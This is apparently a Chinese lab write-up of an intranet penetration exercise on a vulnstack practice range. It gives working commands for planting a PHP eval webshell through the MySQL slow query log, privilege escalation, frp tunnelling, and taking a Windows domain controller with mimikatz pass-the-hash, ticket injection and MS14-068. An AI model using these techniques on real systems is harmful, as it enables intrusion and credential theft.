內網滲透之小試牛刀
離你最近的地方,路途最遠。
思路:
獲取服務器權限->進入內網->判斷是否在域中->信息收集(定位域控、域主機、域用戶賬號密碼等)->橫向移動(漏洞利用)->拿下域控。
獲取權限:
靶場爲http://vulnstack.qiyuanxuetang.net/vuln
直接開搞,首先判斷yxcms,然後根據版本嘗試一些漏洞無果,進而收集端口以及目錄,發現phpmyadmin,弱口令進入
通過慢查詢日誌getshell
show variables like '%slow%';
set GLOBAL slow_query_log=on;
set global slow_query_log_file = 'c:/phpstudy/www/1.php';
select '<?php eval($_POST[cmd]);?>' from mysql.db where sleep(10);
即可獲取shell:
準備工作:
由於菜刀不好用,直接反彈cs,
然後將cs傳給msf,首先msf利用exploit/multi/handler監聽,然後cs中把msf監聽地址以及端口添加到listen並使用forgein進行監聽,然後cs中spawn即可。
內網蒐集:
一切就緒,就可以開始信息收集了,首先判斷是否在域中,通過ipconfig /all,即可簡單判斷在域中。
但是現在使用的是本機普通用戶,所以準備提權,進而收集相關域信息,如果提權不了,只能橫向滲透,尋找域用戶以及提權(當你是域用戶以及system權限都可執行域命令)。
利用cs直接提權,也可上傳如CVE-2019-0803、或利用Powershell提權等,
msf提權,多種方法比如自帶的bypassuac(exploit/windows/local/bypassuac…)以及一些系統溢出漏洞提權,利用use post/multi/recon/local_exploit_suggester等等,即可提權。
首先裏mimikatz收集賬號密碼信息,看是否存在域管理員密碼,域成員密碼等
然後開始收集相關域信息
ipconfig 查看ip
net view /domain 查看有幾個域
net time /domain 查看時間/一般也就是域控
net user /domain 查看域用戶
net group "domain computers" /domain 查看域內所有的主機名
net group "domain admins" /domain 查看域管理員
net group "domain controllers" /domain 查看域控
初步判斷
域爲god.org
域中三臺服務器
域控owa.god.org(192.168.52.138)
本機STU1內網ip爲(192.168.52.143)
ROOT-TVI862UBEH主機ip(192.168.52.141)
域用戶爲:Administrator Guest krbtgt ligang liukaifeng01
橫向滲透:
首先添加路由,即可訪問到本機可以訪問到的主機
route add 0.0.0.0 0.0.0.0 1
route print
然後利用掃描一波內網,利用auxiliary/scanner/portscan/tcp
cs掃描該網段
首先利用frp建立隧道轉發,把frpc.exe、frpc.ini上傳目標機,運行frpc.exe -c frpc.ini,攻擊機執行frps -c frps.ini,即可搭建成功。
然後掃描針對於不同端口,進行不同攻擊。
比如445查看是否存在17-010漏洞,7001weblogic反序列化,以及開啓的web服務等等,獲取相對於服務器權限。
拿下域控:
- 令牌假冒攻擊:
meterpreter下
use incognito
list_tokens -u
impersonate_token \\用戶
或者steal_token域管pid即可獲取域控。
然後可以利用dir查詢所有服務器目錄
dir \\192.168.52.138\c$ 查看c盤
dir \\192.168.52.138\c$\*.txt /s /b 在c盤下搜.txt文件
2. PTH:
找到域管NTLM哈希,
cs利用
msf利用mimikatz或exploit/windows/smb/psexec_psh
sekurlsa::pth /user:administrator /domain:"god.org" /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0
3. ptt之非約束委派TGT攻擊:
privilege::debug
sekurlsa::tickets /export 導出所有內存票據
Kerberos::purge 清除內存票據
kerberos::ptt [0;ac01a][email protected] 將TGT內容導入到當前會話中
kerberos::list 查看
即可獲取域控。
4. ppt之ms14-068
獲取一個域成員及密碼以及域控沒有打3011780補丁即可。
首先獲取域成員sid
然後在域機器中生成TGT票據,利用ms14-068exp生成.ccache文件,
MS14-068.exe -u 域成員名@域名 -s 域成員sid -d 域控制器地址 -p 域成員密碼
!
然後進行票據注入
kerberos::purge //清空當前機器中所有憑證,如果有域成員憑證會影響憑證僞造
kerberos::list //查看是否當前機器憑證
kerberos::ptc //將票據注入到內存中
即可獲取域控,
**餘生很長,請多指教。**